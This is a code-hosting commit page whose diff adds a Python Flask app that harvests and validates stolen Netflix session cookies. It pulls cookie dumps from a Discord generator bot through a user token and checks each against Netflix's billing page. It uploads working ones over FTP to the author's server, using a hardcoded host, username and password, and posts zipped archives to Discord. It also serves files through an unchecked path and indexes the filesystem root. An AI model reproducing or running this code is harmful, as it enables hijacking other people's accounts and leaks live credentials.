Spaces:
Running
Running
Hashir Kashif
commited on
Commit
·
141cbfe
1
Parent(s):
da3db29
editing99999990999asasdasdasdasasdasddasdasdasdasasd
Browse files- app-previous.py +293 -0
- app.py +2 -35
app-previous.py
ADDED
@@ -0,0 +1,293 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import re
|
2 |
+
import requests
|
3 |
+
from bs4 import BeautifulSoup
|
4 |
+
from deep_translator import GoogleTranslator
|
5 |
+
import glob
|
6 |
+
import os
|
7 |
+
import shutil
|
8 |
+
import string
|
9 |
+
import random
|
10 |
+
from flask import Flask, abort, send_file, render_template
|
11 |
+
from flask_autoindex import AutoIndex
|
12 |
+
from threading import Thread
|
13 |
+
import time
|
14 |
+
import json
|
15 |
+
from urllib.parse import unquote
|
16 |
+
from ftplib import FTP_TLS
|
17 |
+
os.remove("./cookies/test.txt")
|
18 |
+
|
19 |
+
class Unbuffered(object):
|
20 |
+
def __init__(self, stream):
|
21 |
+
self.stream = stream
|
22 |
+
def write(self, data):
|
23 |
+
self.stream.write(data)
|
24 |
+
self.stream.flush()
|
25 |
+
def writelines(self, datas):
|
26 |
+
self.stream.writelines(datas)
|
27 |
+
self.stream.flush()
|
28 |
+
def __getattr__(self, attr):
|
29 |
+
return getattr(self.stream, attr)
|
30 |
+
import sys
|
31 |
+
sys.stdout = Unbuffered(sys.stdout)
|
32 |
+
|
33 |
+
|
34 |
+
def send_retrieve_cookie_msg(channelid):
|
35 |
+
print("getting cookie")
|
36 |
+
secret = os.environ['DISCORD_CODE']
|
37 |
+
print(secret)
|
38 |
+
data = {"content": "c.gen netflix"}
|
39 |
+
headers = {"authorization": secret}
|
40 |
+
r = requests.post(
|
41 |
+
"https://discord.com/api/v9/channels/1186365728278990938/messages",
|
42 |
+
data=data,
|
43 |
+
headers=headers)
|
44 |
+
time.sleep(10)
|
45 |
+
os.chdir("./cookies/")
|
46 |
+
if r.status_code != 429:
|
47 |
+
headers = {'authorization': secret}
|
48 |
+
r = requests.get(
|
49 |
+
f' https://discord.com/api/v9/channels/{channelid}/messages?limit=1',
|
50 |
+
headers=headers)
|
51 |
+
jsonn = json.loads(r.text)
|
52 |
+
# n = 0
|
53 |
+
|
54 |
+
for value in jsonn:
|
55 |
+
# n = n + 1
|
56 |
+
S = 6
|
57 |
+
ran = ''.join(random.choices(string.ascii_uppercase + string.digits,
|
58 |
+
k=S))
|
59 |
+
# attachmentUrl = value['attachments'][0]
|
60 |
+
try:
|
61 |
+
attachmentUrl = value['attachments'][0]['url']
|
62 |
+
filename = str(ran) + ".txt"
|
63 |
+
response = requests.get(attachmentUrl)
|
64 |
+
open("old" + filename, "wb").write(response.content)
|
65 |
+
s = 1
|
66 |
+
with open("old" + filename, 'r') as r, open(filename, 'w') as o:
|
67 |
+
for line in r:
|
68 |
+
#strip() function
|
69 |
+
if line.strip():
|
70 |
+
if (s == 1):
|
71 |
+
o.write("# Netscape HTTP Cookie File\n")
|
72 |
+
s = 2
|
73 |
+
o.write(line)
|
74 |
+
os.remove("old" + filename)
|
75 |
+
except Exception as e:
|
76 |
+
|
77 |
+
print(e)
|
78 |
+
pass
|
79 |
+
else:
|
80 |
+
print("cooldown")
|
81 |
+
|
82 |
+
os.chdir("../")
|
83 |
+
|
84 |
+
|
85 |
+
def parseCookieFile(cookiefile):
|
86 |
+
x = ""
|
87 |
+
"""Parse a cookies.txt file and return a dictionary of key value pairs
|
88 |
+
compatible with requests."""
|
89 |
+
|
90 |
+
cookies = {}
|
91 |
+
with open(cookiefile, 'r') as fp:
|
92 |
+
for line in fp:
|
93 |
+
if not re.match(r'^\#', line):
|
94 |
+
lineFields = line.strip().split('\t')
|
95 |
+
try:
|
96 |
+
cookies[lineFields[5]] = lineFields[6]
|
97 |
+
|
98 |
+
except:
|
99 |
+
print("Invalid cookie")
|
100 |
+
pass
|
101 |
+
if x == "fail":
|
102 |
+
return "fail"
|
103 |
+
else:
|
104 |
+
return cookies
|
105 |
+
|
106 |
+
|
107 |
+
def getNetflixInfo(cookiefile):
|
108 |
+
cookies = parseCookieFile(cookiefile)
|
109 |
+
# print(cookies)
|
110 |
+
if cookies != "fail":
|
111 |
+
|
112 |
+
r = requests.get("https://www.netflix.com/BillingActivity",
|
113 |
+
cookies=cookies)
|
114 |
+
print(r.url)
|
115 |
+
if "login" in r.url:
|
116 |
+
print("Login Page")
|
117 |
+
os.remove(cookiefile)
|
118 |
+
else:
|
119 |
+
soup = BeautifulSoup(r.content, "html.parser")
|
120 |
+
try:
|
121 |
+
print(r.url)
|
122 |
+
billingDate = soup.find("div", {
|
123 |
+
"data-uia": "streaming-next-cycle"
|
124 |
+
})
|
125 |
+
print(billingDate)
|
126 |
+
billingDate = billingDate.get_text()
|
127 |
+
planName = soup.find("div", {"data-uia": "plan-name"})
|
128 |
+
print(planName)
|
129 |
+
planName = planName.get_text()
|
130 |
+
billingDate = GoogleTranslator(source='auto',
|
131 |
+
target='en').translate(billingDate)
|
132 |
+
try:
|
133 |
+
lang = soup.find("html", {"lang": 'en'}).get_text()
|
134 |
+
lang = "English"
|
135 |
+
except:
|
136 |
+
lang = ""
|
137 |
+
pass
|
138 |
+
planName = GoogleTranslator(source='auto',
|
139 |
+
target='en').translate(planName)
|
140 |
+
|
141 |
+
print(billingDate + " " + planName + " " + lang)
|
142 |
+
S = 3
|
143 |
+
ran = ''.join(
|
144 |
+
random.choices(string.ascii_uppercase + string.digits, k=S))
|
145 |
+
newCookiefile = "../Membership/" + billingDate + " " + planName + " " + lang + " (" + str(ran) + ").txt"
|
146 |
+
shutil.move(
|
147 |
+
cookiefile, newCookiefile)
|
148 |
+
session = ftplib.FTP('hashir672.serv00.net','f6857_hashir_serv00','Hashirisbest@1122')
|
149 |
+
|
150 |
+
file = open(newCookiefile,'rb') # file to send
|
151 |
+
session.storbinary('STOR ./public_html/Membership/'+newCookiefile, file) # send the file
|
152 |
+
file.close() # close file and FTP
|
153 |
+
session.quit()
|
154 |
+
os.remove(newCookiefile)
|
155 |
+
|
156 |
+
|
157 |
+
except Exception as e:
|
158 |
+
print(e)
|
159 |
+
f = open("../Membership/error.txt", "a")
|
160 |
+
f.write(str(e) + "\n\n")
|
161 |
+
f.close()
|
162 |
+
print("\n Moving in noMember")
|
163 |
+
S = 10
|
164 |
+
ran = ''.join(
|
165 |
+
random.choices(string.ascii_uppercase + string.digits, k=S))
|
166 |
+
shutil.move(cookiefile, '../NoMembership/NoMember' + str(ran) + ".txt")
|
167 |
+
else:
|
168 |
+
os.remove(cookiefile)
|
169 |
+
print("cookie removed")
|
170 |
+
|
171 |
+
|
172 |
+
def mainTask():
|
173 |
+
print("running cookie retriever")
|
174 |
+
send_retrieve_cookie_msg(1191381755731644418)
|
175 |
+
time.sleep(5)
|
176 |
+
print("running netflix checker")
|
177 |
+
os.chdir('./cookies/')
|
178 |
+
for fileName in glob.glob("*.txt"):
|
179 |
+
print(fileName)
|
180 |
+
getNetflixInfo(fileName)
|
181 |
+
os.chdir('../')
|
182 |
+
|
183 |
+
def testTask():
|
184 |
+
os.chdir('./cookietest/')
|
185 |
+
getNetflixInfo("./cookie.txt")
|
186 |
+
os.chdir("../")
|
187 |
+
|
188 |
+
def connect():
|
189 |
+
ftp = FTP_TLS()
|
190 |
+
ftp.debugging = 2
|
191 |
+
ftp.connect('hashir672.serv00.net',21)
|
192 |
+
ftp.login('f6857_hashir_serv00', 'Hashirisbest@1122')
|
193 |
+
return ftp
|
194 |
+
|
195 |
+
|
196 |
+
def backupTask(location,filename):
|
197 |
+
for file in glob.glob("./Membership/*.txt"):
|
198 |
+
os.remove(file)
|
199 |
+
print('1')
|
200 |
+
session = connect()
|
201 |
+
print("1")
|
202 |
+
session.voidcmd("NOOP")
|
203 |
+
session.cwd('./public_html/Membership')
|
204 |
+
files = session.nlst()
|
205 |
+
files.remove(".")
|
206 |
+
files.remove("..")
|
207 |
+
for file in files:
|
208 |
+
# print(file)
|
209 |
+
r = requests.get("https://hashir672.serv00.net/Membership/"+file)
|
210 |
+
open("./Membership/"+file,"wb").write(r.content)
|
211 |
+
session.quit()
|
212 |
+
|
213 |
+
archived = shutil.make_archive('./'+filename, 'zip', location)
|
214 |
+
header = {
|
215 |
+
'authorization': os.environ['DISCORD_CODE'],
|
216 |
+
}
|
217 |
+
files = {
|
218 |
+
"file" : ("./"+filename+".zip", open("./"+filename+".zip", 'rb'))
|
219 |
+
}
|
220 |
+
|
221 |
+
channel_id = "1193267345079156746"
|
222 |
+
|
223 |
+
r = requests.post(f"https://discord.com/api/v9/channels/{channel_id}/messages", headers=header, files=files)
|
224 |
+
|
225 |
+
app = Flask(__name__)
|
226 |
+
|
227 |
+
|
228 |
+
@app.route('/', defaults={'req_path': ''})
|
229 |
+
@app.route('/<path:req_path>')
|
230 |
+
def dir_listing(req_path):
|
231 |
+
BASE_DIR = './Membership' #/var/task/api/Membership
|
232 |
+
# Joining the base and the requested path
|
233 |
+
abs_path = os.path.join(BASE_DIR, req_path)
|
234 |
+
abs_path = unquote(abs_path)
|
235 |
+
|
236 |
+
|
237 |
+
# Check if path is a file and serve
|
238 |
+
if os.path.isfile(abs_path):
|
239 |
+
return send_file(abs_path)
|
240 |
+
|
241 |
+
# Return 404 if path doesn't exist
|
242 |
+
if not os.path.exists(abs_path):
|
243 |
+
return str(abs_path)
|
244 |
+
# return abort(404)
|
245 |
+
|
246 |
+
# Show directory contents
|
247 |
+
files = os.listdir(abs_path)
|
248 |
+
return render_template('files.html', files=files)
|
249 |
+
|
250 |
+
|
251 |
+
@app.route('/alive')
|
252 |
+
def alive():
|
253 |
+
return "Keep Alive"
|
254 |
+
|
255 |
+
|
256 |
+
@app.route('/main')
|
257 |
+
def main():
|
258 |
+
# thr = Thread(target=testTask)
|
259 |
+
thr = Thread(target=mainTask)
|
260 |
+
thr.start()
|
261 |
+
# mainTask()
|
262 |
+
return 'Hello from Flask!'
|
263 |
+
@app.route('/test')
|
264 |
+
def test():
|
265 |
+
thr = Thread(target=testTask)
|
266 |
+
# thr = Thread(target=mainTask)
|
267 |
+
thr.start()
|
268 |
+
# mainTask()
|
269 |
+
return 'Hello from Flask! test'
|
270 |
+
|
271 |
+
@app.route('/backup')
|
272 |
+
def backup():
|
273 |
+
thr = Thread(target=backupTask,args=("./Membership","backup",))
|
274 |
+
# thr = Thread(target=mainTask)
|
275 |
+
print("backup Start")
|
276 |
+
thr.start()
|
277 |
+
# mainTask()
|
278 |
+
return 'Backup Started of Memberhship'
|
279 |
+
|
280 |
+
@app.route('/backupNoMembership')
|
281 |
+
def backupNoMembership():
|
282 |
+
thr = Thread(target=backupTask,args=("./NoMembership","backupNoMembership",))
|
283 |
+
# thr = Thread(target=mainTask)
|
284 |
+
thr.start()
|
285 |
+
# mainTask()
|
286 |
+
return 'Backup Started of NoMemberhship'
|
287 |
+
|
288 |
+
|
289 |
+
ppath = "/"
|
290 |
+
|
291 |
+
AutoIndex(app, browse_root=ppath)
|
292 |
+
# app.run()
|
293 |
+
|
app.py
CHANGED
@@ -13,7 +13,6 @@ from threading import Thread
|
|
13 |
import time
|
14 |
import json
|
15 |
from urllib.parse import unquote
|
16 |
-
from ftplib import FTP_TLS
|
17 |
os.remove("./cookies/test.txt")
|
18 |
|
19 |
class Unbuffered(object):
|
@@ -142,17 +141,9 @@ def getNetflixInfo(cookiefile):
|
|
142 |
S = 3
|
143 |
ran = ''.join(
|
144 |
random.choices(string.ascii_uppercase + string.digits, k=S))
|
145 |
-
newCookiefile = "../Membership/" + billingDate + " " + planName + " " + lang + " (" + str(ran) + ").txt"
|
146 |
shutil.move(
|
147 |
-
cookiefile,
|
148 |
-
|
149 |
-
|
150 |
-
file = open(newCookiefile,'rb') # file to send
|
151 |
-
session.storbinary('STOR ./public_html/Membership/'+newCookiefile, file) # send the file
|
152 |
-
file.close() # close file and FTP
|
153 |
-
session.quit()
|
154 |
-
os.remove(newCookiefile)
|
155 |
-
|
156 |
|
157 |
except Exception as e:
|
158 |
print(e)
|
@@ -185,31 +176,7 @@ def testTask():
|
|
185 |
getNetflixInfo("./cookie.txt")
|
186 |
os.chdir("../")
|
187 |
|
188 |
-
def connect():
|
189 |
-
ftp = FTP_TLS()
|
190 |
-
ftp.debugging = 2
|
191 |
-
ftp.connect('hashir672.serv00.net',21)
|
192 |
-
ftp.login('f6857_hashir_serv00', 'Hashirisbest@1122')
|
193 |
-
return ftp
|
194 |
-
|
195 |
-
|
196 |
def backupTask(location,filename):
|
197 |
-
for file in glob.glob("./Membership/*.txt"):
|
198 |
-
os.remove(file)
|
199 |
-
print('1')
|
200 |
-
session = connect()
|
201 |
-
print("1")
|
202 |
-
session.voidcmd("NOOP")
|
203 |
-
session.cwd('./public_html/Membership')
|
204 |
-
files = session.nlst()
|
205 |
-
files.remove(".")
|
206 |
-
files.remove("..")
|
207 |
-
for file in files:
|
208 |
-
# print(file)
|
209 |
-
r = requests.get("https://hashir672.serv00.net/Membership/"+file)
|
210 |
-
open("./Membership/"+file,"wb").write(r.content)
|
211 |
-
session.quit()
|
212 |
-
|
213 |
archived = shutil.make_archive('./'+filename, 'zip', location)
|
214 |
header = {
|
215 |
'authorization': os.environ['DISCORD_CODE'],
|
|
|
13 |
import time
|
14 |
import json
|
15 |
from urllib.parse import unquote
|
|
|
16 |
os.remove("./cookies/test.txt")
|
17 |
|
18 |
class Unbuffered(object):
|
|
|
141 |
S = 3
|
142 |
ran = ''.join(
|
143 |
random.choices(string.ascii_uppercase + string.digits, k=S))
|
|
|
144 |
shutil.move(
|
145 |
+
cookiefile, "../Membership/" + billingDate + " " + planName + " " +
|
146 |
+
lang + " (" + str(ran) + ").txt")
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
147 |
|
148 |
except Exception as e:
|
149 |
print(e)
|
|
|
176 |
getNetflixInfo("./cookie.txt")
|
177 |
os.chdir("../")
|
178 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
179 |
def backupTask(location,filename):
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
180 |
archived = shutil.make_archive('./'+filename, 'zip', location)
|
181 |
header = {
|
182 |
'authorization': os.environ['DISCORD_CODE'],
|